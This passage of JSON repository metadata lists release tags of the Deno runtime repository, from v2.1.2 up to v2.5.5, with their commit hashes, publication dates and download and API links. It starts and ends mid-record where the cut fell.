v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland